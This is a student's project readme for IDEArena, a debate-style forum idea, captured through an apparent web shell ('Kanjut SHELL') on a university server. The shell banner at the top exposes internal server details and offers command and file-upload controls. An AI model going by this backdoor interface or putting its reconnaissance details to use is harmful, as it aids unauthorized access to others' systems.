Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.131.13.196
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/vnlaughlin/public_html/idearena/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/vnlaughlin/public_html/idearena/readme.html
<!DOCTYPE html>
<html lang="en">
<head>
  <title>IDEArena Readme</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
  <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
</head>
<div class="container">
 <body>
	<nav class="navbar navbar-inverse" style="background-color: ;">
  <div class="container-fluid">
    <div class="navbar-header">
      <a class="navbar-brand" href="index.html">Victoria's Page</a>
    </div>
    <ul class="nav navbar-nav">
      <li><a href="index.html">Home</a></li>
      <li><a href="hm_cs480.html">CS480</a></li>
      <li class="active"><a href="hm_project.html">Projects</a></li>
      <li><a href="hm_contact.html">Contact</a></li>
    </ul>
  </div>
</nav>
<style>

	.a{
	    background-color: #a3c1ad !important;
	    color: #ffffff;

}

   .b{
	    background-color: #5f9ea0 !important;
	    color: #ffffff;

}

	.c{
	    background-color: #317873 !important;
	    color: #ffffff;

}
	.d{
	    background-color: #49796b !important;
	    color: #ffffff;

}
	.e{
	    background-color: #49796b !important;
	    color: #ffffff;

}
</style>
  <div class="jumbotron">


<h2>IDEArena</h2>
<hr>
<div class="jumbotron a">
<p><b>Current Progress</b>
<ul>
	<li><a href="databases.html">Code for Databases and Viewpost</a> </li>
</ul>
</div>
<div class="jumbotron a">
<p><b>Abstract.</b> My goal is to create a social media and forum like database where people can discuss ideas while immersing themselves with the opposing idea kind of like a debate team simulation but for an online community. These ideas can include anything from entertainment to serious topics. These are a few things I wish to include in my database and website:
</div>
<div class="jumbotron b">
<p><b>The Arena System</b> Person A posts an idea which can be placed in specific categories. Once clicked by Person B, a popup asks if Person B agrees or disagrees with the idea.
<ul>
<p>If they disagree, and there is no challenger, B is prompted to write why they disagree (up to 5,000 characters). Else, they are allowed to vote on and view the discussion.

<p>If they agree, they can either vote on the proposal or they can write their own proposal based on the idea. They can only see and vote on the top comment of the opposition. This encourages the opposing side to vote for the best idea that the opposing side can see.

<p>If there is no contention in one week, the proposal becomes non-contested.
</ul>
<p>The most viewed/commented on proposals are place within the Coliseum (or the Hot section). The new proposals are placed in the New section.
</div>
<div class="jumbotron c">
<p><b>Dispute</b> People on the opposing side can only view the top voted counterpoint. So, if people want their views to be represented, they have to join the side they actually agree with in order to vote for the better opinion. Otherwise, the dispute side is similar to the idea section.
</div>
<div class="jumbotron d">
<p><b>Switching Sides</b> After voting for the opposing side up to three time, a person can switch sides. This adds to the opposing sides total score.
</div>
<div class="jumbotron e">
<p><b>Winning</b> Each side wins based on the amount of votes each side produced along with how many people switched sides. The side that wins are given votes based on how popular their side ended up in the end. Votes are a precious commodity since only ten votes are given to people every day and this makes it so people are careful with what they vote for (so, not the trolls, etc.)
</div>
<div class="jumbotron e">
<p><b>Clapping</b> Members that are not logged in can only view the top rated responses. They can clap for a side, but their claps do not weigh in on the final score.
</div>
<div class="jumbotron e">
<p><b>Report</b> Report comments for spam.
</div>
<div class="jumbotron e">
<p><b>Overall</b> I want to make a social media platform that feels like a game yet is also educational. I also want to platform that naturally favors "critical thinking" type of comments with "audiance moderation."
</div>
<div class="jumbotron e">
<p><b><br>Basic Goals for the Research.</b>
<ul>
<p>Create the Arena system (have voting, comments, idea, and dispute sections)
<p>Learn how to create a secure login using hashed passwords
<p>Create a secure user system
</ul>
</div>
<div class="jumbotron e">
<p><b>End Goals for Research</b>
<ul><p>Transfer this website to app form for easy access.
</div>
</div>
</body>
</html>

Stv3n404 - 2023